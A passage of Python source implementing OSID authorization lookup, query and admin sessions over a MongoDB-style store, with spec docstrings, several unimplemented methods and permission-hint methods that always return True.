raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure making request
raise: Unsupported - ``condition`` is not of this service
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: Authorizations may be stored in a
normalized form with respect to various Resources and created
using specific nodes in a ``Function`` or ``Qualifier``
hierarchy. The provider needs to maintain a de-normalized
implicit authorization store or expand the applicable
hierarchies on the fly to honor this query. Querying the
authorization service may in itself require a separate
authorization. A ``PermissionDenied`` is a result of this
authorization failure. If no explicit or implicit authorization
exists for the queried tuple, this method should return
``false``.
"""
raise errors.Unimplemented()
class AuthorizationLookupSession(abc_authorization_sessions.AuthorizationLookupSession, osid_sessions.OsidSession):
"""This session defines methods to search and retrieve ``Authorization`` mappings."""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._kwargs = kwargs
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_lookup_authorizations(self):
"""Tests if this user can perform authorization lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.can_lookup_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def use_comparative_authorization_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_comparative_resource_view
self._use_comparative_object_view()
def use_plenary_authorization_view(self):
"""A complete view of the ``Authorization`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_plenary_resource_view
self._use_plenary_object_view()
def use_federated_vault_view(self):
"""Federates the view for methods in this session.
A federated view will include authorizations in vaults which are
children of this vault in the vault hierarchy.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_federated_bin_view
self._use_federated_catalog_view()
def use_isolated_vault_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts lookups to this vault only.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_isolated_bin_view
self._use_isolated_catalog_view()
def use_effective_authorization_view(self):
"""Only authorizations whose effective dates are current are returned by methods in this session.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.use_effective_relationship_view
self._use_effective_view()
def use_any_effective_authorization_view(self):
"""All authorizations of any effective dates are returned by all methods in this session.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.use_any_effective_relationship_view
self._use_any_effective_view()
def use_implicit_authorization_view(self):
"""Sets the view for methods in this session to implicit authorizations.
An implicit view will include authorizations derived from other
authorizations as a result of the ``Qualifier,`` ``Function`` or
``Resource`` hierarchies. This method is the opposite of
``explicitAuthorizationView()``.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def use_explicit_authorization_view(self):
"""Sets the view for methods in this session to explicit authorizations.
An explicit view includes only those authorizations that were
explicitly defined and not implied. This method is the opposite
of ``implicitAuthorizationView()``.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorization(self, authorization_id):
"""Gets the ``Authorization`` specified by its ``Id``.
In plenary mode, the exact ``Id`` is found or a ``NotFound``
results. Otherwise, the returned ``Authorization`` may have a
different ``Id`` than requested, such as the case where a
duplicate ``Id`` was assigned to an ``Authorization`` and
retained for compatibility.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization`` to retrieve
return: (osid.authorization.Authorization) - the returned
``Authorization``
raise: NotFound - no ``Authorization`` found with the given
``Id``
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resource
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find_one(
dict({'_id': ObjectId(self._get_id(authorization_id, 'authorization').get_identifier())},
**self._view_filter()))
return objects.Authorization(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_authorizations_by_ids(self, authorization_ids):
"""Gets an ``AuthorizationList`` corresponding to the given ``IdList``.
In plenary mode, the returned list contains all of the
authorizations specified in the ``Id`` list, in the order of the
list, including duplicates, or an error results if an ``Id`` in
the supplied list is not found or inaccessible. Otherwise,
inaccessible ``Authorizations`` may be omitted from the list and
may present the elements in any order including returning a
unique set.
arg: authorization_ids (osid.id.IdList): the list of ``Ids``
to retrieve
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NotFound - an ``Id was`` not found
raise: NullArgument - ``authorization_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_ids
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
object_id_list = []
for i in authorization_ids:
object_id_list.append(ObjectId(self._get_id(i, 'authorization').get_identifier()))
result = collection.find(
dict({'_id': {'$in': object_id_list}},
**self._view_filter()))
result = list(result)
sorted_result = []
for object_id in object_id_list:
for object_map in result:
if object_map['_id'] == object_id:
sorted_result.append(object_map)
break
return objects.AuthorizationList(sorted_result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_authorizations_by_genus_type(self, authorization_genus_type):
"""Gets an ``AuthorizationList`` corresponding to the given authorization genus ``Type`` which does not include authorizations of genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: authorization_genus_type (osid.type.Type): an
authorization genus type
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: NullArgument - ``authorization_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_genus_type
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'genusTypeId': str(authorization_genus_type)},
**self._view_filter())).sort('_id', DESCENDING)
return objects.AuthorizationList(result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_authorizations_by_parent_genus_type(self, authorization_genus_type):
"""Gets an ``AuthorizationList`` corresponding to the given authorization genus ``Type`` and include authorizations of genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: authorization_genus_type (osid.type.Type): an
authorization genus type
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: NullArgument - ``authorization_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_parent_genus_type
# STILL NEED TO IMPLEMENT!!!
return objects.AuthorizationList([])
@utilities.arguments_not_none
def get_authorizations_by_record_type(self, authorization_record_type):
"""Gets an ``AuthorizationList`` containing the given authorization record ``Type``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: authorization_record_type (osid.type.Type): an
authorization record type
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: NullArgument - ``authorization_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_record_type
# STILL NEED TO IMPLEMENT!!!
return objects.AuthorizationList([])
@utilities.arguments_not_none
def get_authorizations_on_date(self, from_, to):
"""Gets an ``AuthorizationList`` effective during the entire given date range inclusive but not confined to the date range.
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``from`` or ``to`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.get_relationships_on_date
authorization_list = []
for authorization in self.get_authorizations():
if overlap(from_, to, authorization.start_date, authorization.end_date):
authorization_list.append(authorization)
return objects.AuthorizationList(authorization_list, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_resource(self, resource_id):
"""Gets a list of ``Authorizations`` associated with a given resource.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned. In plenary mode, the
returned list contains all known authorizations or an error
results. Otherwise, the returned list may contain only those
authorizations that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``resource_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_resource_on_date(self, resource_id, from_, to):
"""Gets an ``AuthorizationList`` effective during the entire given date range inclusive but not confined to the date range.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
In effective mode, authorizations are returned that are
currently effective. In any effective mode, active
authorizations and those currently expired are returned.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``resource_id, from`` or ``to`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_agent(self, agent_id):
"""Gets a list of ``Authorizations`` associated with a given agent.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: agent_id (osid.id.Id): an agent ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``agent_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_agent_on_date(self, agent_id, from_, to):
"""Gets an ``AuthorizationList`` for the given agent and effective during the entire given date range inclusive but not confined to the date range.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``agent_id, from`` or ``to`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_function(self, function_id):
"""Gets a list of ``Authorizations`` associated with a given function.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: function_id (osid.id.Id): a function ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``function_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.learning.ActivityLookupSession.get_activities_for_objective_template
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'functionId': str(function_id)},
**self._view_filter()))
return objects.AuthorizationList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_function_on_date(self, function_id, from_, to):
"""Gets an ``AuthorizationList`` for the given function and effective during the entire given date range inclusive but not confined to the date range.
arg: function_id (osid.id.Id): a function ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``function_id, from`` or ``to`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_resource_and_function(self, resource_id, function_id):
"""Gets a list of ``Authorizations`` associated with a given resource.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned. In plenary mode, the
returned list contains all known authorizations or an error
results. Otherwise, the returned list may contain only those
authorizations that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: function_id (osid.id.Id): a function ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``resource_id`` or ``function_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.get_relationships_for_peers
# NOTE: This implementation currently ignores plenary and effective views
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'sourceId': str(resource_id),
'destinationId': str(function_id)},
**self._view_filter())).sort('_id', ASCENDING)
return objects.AuthorizationList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_resource_and_function_on_date(self, resource_id, function_id, from_, to):
"""Gets an ``AuthorizationList`` effective during the entire given date range inclusive but not confined to the date range.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
In effective mode, authorizations are returned that are
currently effective. In any effective mode, active
authorizations and those currently expired are returned.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: function_id (osid.id.Id): a function ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``resource_id, function_id, from`` or
``to`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_agent_and_function(self, agent_id, function_id):
"""Gets a list of ``Authorizations`` associated with a given agent.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned. In plenary mode, the
returned list contains all known authorizations or an error
results. Otherwise, the returned list may contain only those
authorizations that are accessible through this session.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: function_id (osid.id.Id): a function ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``agent_id`` or ``function_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'agentId': str(agent_id),
'functionId': str(function_id)},
**self._view_filter())).sort('_sort_id', ASCENDING)
return objects.AuthorizationList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_agent_and_function_on_date(self, agent_id, function_id, from_, to):
"""Gets an ``AuthorizationList`` for the given agent and effective during the entire given date range inclusive but not confined to the date range.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: function_id (osid.id.Id): a function ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``agent_id, function_id, from`` or ``to``
is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_by_qualifier(self, qualifier_id):
"""Gets a list of ``Authorizations`` associated with a given qualifier.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: qualifier_id (osid.id.Id): a qualifier ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``qualifier_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_explicit_authorization(self, authorization_id):
"""Gets the explicit ``Authorization`` that generated the given implicit authorization.
If the given ``Authorization`` is explicit, then the same
``Authorization`` is returned.
arg: authorization_id (osid.id.Id): an authorization
return: (osid.authorization.Authorization) - the explicit
``Authorization``
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_authorizations(self):
"""Geta all ``Authorizations``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
return: (osid.authorization.AuthorizationList) - a list of
``Authorizations``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(self._view_filter()).sort('_id', DESCENDING)
return objects.AuthorizationList(result, runtime=self._runtime, proxy=self._proxy)
authorizations = property(fget=get_authorizations)
class AuthorizationQuerySession(abc_authorization_sessions.AuthorizationQuerySession, osid_sessions.OsidSession):
"""This session provides methods for searching ``Authorization`` objects.
The search query is constructed using the ``AuthorizationQuery``.
This session defines views that offer differing behaviors for
searching.
* federated view: searches include authorizations in ``Vaults`` of
which this vault is an ancestor in the vault hierarchy
* isolated view: searches are restricted to authorizations in this
``Vault``
* implicit authorization view: authorizations include implicit
authorizations
* explicit authorization view: only explicit authorizations are
returned
"""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._kwargs = kwargs
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_search_authorizations(self):
"""Tests if this user can perform authorization searches.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer search
operations to unauthorized users.
return: (boolean) - ``false`` if search methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceQuerySession.can_search_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def use_federated_vault_view(self):
"""Federates the view for methods in this session.
A federated view will include authorizations in vaults which are
children of this vault in the vault hierarchy.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_federated_bin_view
self._use_federated_catalog_view()
def use_isolated_vault_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts searches to this vault only.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_isolated_bin_view
self._use_isolated_catalog_view()
def use_implicit_authorization_view(self):
"""Sets the view for methods in this session to implicit authorizations.
An implicit view will include authorizations derived from other
authorizations as a result of the ``Qualifier,`` ``Function`` or
``Resource`` hierarchies. This method is the opposite of
``explicitAuthorizationView()``.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def use_explicit_authorization_view(self):
"""Sets the view for methods in this session to explicit authorizations.
An explicit view includes only those authorizations that were
explicitly defined and not implied. This method is the opposite
of ``implicitAuthorizationView()``.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_authorization_query(self):
"""Gets an authorization query.
return: (osid.authorization.AuthorizationQuery) - the
authorization query
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceQuerySession.get_resource_query_template
return queries.AuthorizationQuery(runtime=self._runtime)
authorization_query = property(fget=get_authorization_query)
@utilities.arguments_not_none
def get_authorizations_by_query(self, authorization_query):
"""Gets a list of ``Authorizations`` matching the given query.
arg: authorization_query
(osid.authorization.AuthorizationQuery): the
authorization query
return: (osid.authorization.AuthorizationList) - the returned
``AuthorizationList``
raise: NullArgument - ``authorization_query`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``authorization_query`` is not of this
service
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceQuerySession.get_resources_by_query
and_list = list()
or_list = list()
for term in authorization_query._query_terms:
if '$in' in authorization_query._query_terms[term] and '$nin' in authorization_query._query_terms[term]:
and_list.append(
{'$or': [{term: {'$in': authorization_query._query_terms[term]['$in']}},
{term: {'$nin': authorization_query._query_terms[term]['$nin']}}]})
else:
and_list.append({term: authorization_query._query_terms[term]})
for term in authorization_query._keyword_terms:
or_list.append({term: authorization_query._keyword_terms[term]})
if or_list:
and_list.append({'$or': or_list})
view_filter = self._view_filter()
if view_filter:
and_list.append(view_filter)
if and_list:
query_terms = {'$and': and_list}
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(query_terms).sort('_id', DESCENDING)
else:
result = []
return objects.AuthorizationList(result, runtime=self._runtime, proxy=self._proxy)
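# A worked example of the term-merging above, with hypothetical values: given
# _query_terms = {'functionId': {'$in': ['f1'], '$nin': ['f2']}} and one keyword
# term {'displayName.text': 'admin'}, the method assembles a MongoDB filter
# shaped like (the view filter is whatever self._view_filter() returns):
#     {'$and': [
#         {'$or': [{'functionId': {'$in': ['f1']}},
#                  {'functionId': {'$nin': ['f2']}}]},
#         {'$or': [{'displayName.text': 'admin'}]},
#         <view filter>,
#     ]}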
class AuthorizationAdminSession(abc_authorization_sessions.AuthorizationAdminSession, osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Authorizations``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create an
``Authorization,`` an ``AuthorizationForm`` is requested using
``get_authorization_form_for_create()`` specifying the desired
relationship peers and record ``Types`` or none if no record
``Types`` are needed. The returned ``AuthorizationForm`` will
indicate that it is to be used with a create operation and can be
used to examine metadata or validate data prior to creation. Once the
``AuthorizationForm`` is submitted to a create operation, it cannot
be reused with another create operation unless the first operation
was unsuccessful. Each ``AuthorizationForm`` corresponds to an
attempted transaction.
For updates, ``AuthorizationForms`` are requested to the
``Authorization`` ``Id`` that is to be updated using
``getAuthorizationFormForUpdate()``. Similarly, the
``AuthorizationForm`` has metadata about the data that can be
updated and it can perform validation before submitting the update.
The ``AuthorizationForm`` can only be used once for a successful
update and cannot be reused.
The delete operations delete ``Authorizations``. To unmap an
``Authorization`` from the current ``Vault,`` the
``AuthorizationVaultAssignmentSession`` should be used. These delete
operations attempt to remove the ``Authorization`` itself thus
removing it from all known ``Vault`` catalogs.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
"""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._forms = dict()
self._kwargs = kwargs
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_create_authorizations(self):
"""Tests if this user can create ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer create
operations to unauthorized users.
return: (boolean) - ``false`` if ``Authorization`` creation is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def can_create_authorization_with_record_types(self, authorization_record_types):
"""Tests if this user can create a single ``Authorization`` using the desired record types.
While ``AuthorizationManager.getAuthorizationRecordTypes()`` can
be used to examine which records are supported, this method
tests which record(s) are required for creating a specific
``Authorization``. Providing an empty array tests if an
``Authorization`` can be created with no records.
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (boolean) - ``true`` if ``Authorization`` creation using
the specified ``Types`` is supported, ``false``
otherwise
raise: NullArgument - ``authorization_record_types`` is
``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resource_with_record_types
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_authorization_form_for_create_for_agent(self, agent_id, function_id, qualifier_id, authorization_record_types):
"""Gets the authorization form for creating new authorizations.
A new form should be requested for each create transaction.
arg: agent_id (osid.id.Id): the agent ``Id``
arg: function_id (osid.id.Id): the function ``Id``
arg: qualifier_id (osid.id.Id): the qualifier ``Id``
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``agent_id, function_id`` or ``qualifier_id``
is not found
raise: NullArgument - ``agent_id, function_id, qualifier_id``
or ``authorization_record_types`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
if not isinstance(agent_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(function_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(qualifier_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
for arg in authorization_record_types:
if not isinstance(arg, ABCType):
raise errors.InvalidArgument('one or more argument array elements is not a valid OSID Type')
if authorization_record_types == []:
# NOTE: passing vault_id=self._catalog_id below appears redundant with
# catalog_id, and agent_id could likely come from the proxy instead
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
agent_id=agent_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
else:
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
record_types=authorization_record_types,
agent_id=agent_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
obj_form._for_update = False
self._forms[obj_form.get_id().get_identifier()] = not CREATED
return obj_form
@utilities.arguments_not_none
def get_authorization_form_for_create_for_resource(self, resource_id, function_id, qualifier_id, authorization_record_types):
"""Gets the authorization form for creating new authorizations.
A new form should be requested for each create transaction.
arg: resource_id (osid.id.Id): the resource ``Id``
